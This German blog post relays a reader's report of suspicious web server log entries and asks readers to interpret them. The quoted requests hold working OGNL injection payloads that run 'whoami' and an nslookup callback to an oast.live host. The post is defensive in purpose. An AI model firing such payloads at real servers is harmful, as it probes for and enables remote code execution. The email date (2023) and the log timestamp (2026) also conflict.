Merkwürdigkeit in (Web-)Server Log-Dateien

Ich stelle mal einen Sachverhalt hier im Blog ein, auf den ich mir noch keinen finalen Reim machen kann. Einem Benutzer ist beim Auswerten seiner Server-Log-Dateien aufgefallen, dass es immer wieder Versuche gibt, eine bestimmte Datei von diesem Webserver herunter zu laden. Spontan tippe ich darauf, dass da irgend eine Schwachstelle ausgekundschaftet werden soll.

Blog-Leser Wolfgang O. hat mich zum 9. Juni 2023 per Mail bezüglich des Themas kontaktiert, ich komme aber erst jetzt dazu, das Ganze hier im Blog einzustellen. Wolfgang schrieb:

Seltsamkeit in Server-Log

Hallo Günter,

heute habe ich im Log meines Servers etwas für mich noch unbekanntes
entdeckt. Jemand hat versucht, folgende "Datei" herunterzuladen:

hddps:  //mein. webserver . de/${(#a=@org . apache.commons . io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Im Log steht dazu folgender Eintrag:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 
HTTP/1.1 
Host: n.n.n.n 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 
Connection: close 
Accept: */* 
Accept-Language: en 
Accept-Encoding: gzip 
08.06.2026 um 13:57:21 

Dann, eine Sekunde später und mit anderem User-Agent:

GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20ci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live%22%29%7D/ 
HTTP/1.1 
Host: n.n.n.n 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/34.0.1866.237 Safari/537.36 
Connection: close 
Accept: */* 
Accept-Language: en 
Accept-Encoding: gzip 

für diese "Datei":

hddps : //mein. webserver. de/${@java.lang.Runtime@getRuntime().exec("nslookupci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live")}

In beiden Fällen kam der Besucher von folgender IP-Adresse:

WHOIS Source: RIPE NCC
IP Address:   45.83.123.30
Country:      Netherlands
Network Name: LXD
Owner Name:
CIDR:         45.83.122.0/23
>From IP:      45.83.122.0
To IP:        45.83.123.255
Allocated:    Yes
Contact Name: Rea Ketty
Address:      SEYCHELLES, Mahe, 1111, House of Francis, Room 303, IIe Du
Port
Email:        abuse.itweb@gmail.com
Abuse Email:  abuse.itweb@gmail.com
Phone:        +14708099233
Fax:

Eine erste schnelle Suche bei Google hat nichts ergeben. Ecosia hat die Suche geblockt ("Suspicious").

Ist das was Neues?

Falls ja, vielleicht hast Du ja jemanden, den das interessieren könnte. Ich selber kenne da niemanden. Ich habe im übrigen alle Verweise auf meinen Server anonymisiert. Er steht bei HostEurope, ein selbstgeschriebener Webserver, deshalb liefen die Versuche mit Apache und Java ins Leere. Ansonsten hätte der Besucher wohl mehr versucht. Vermutung meinerseits.

Mal schauen, ob die Mail wegen der eingebetteten Links überhaupt durch den Spamfilter kommt. Deshalb habe ich das da oben jeweils am Anfang  zerstückelt.

Danke fürs Lesen und dann noch ein schönes Wochenende

Frage an die Leserschaft: Kann sich jemand einen Reim darauf machen?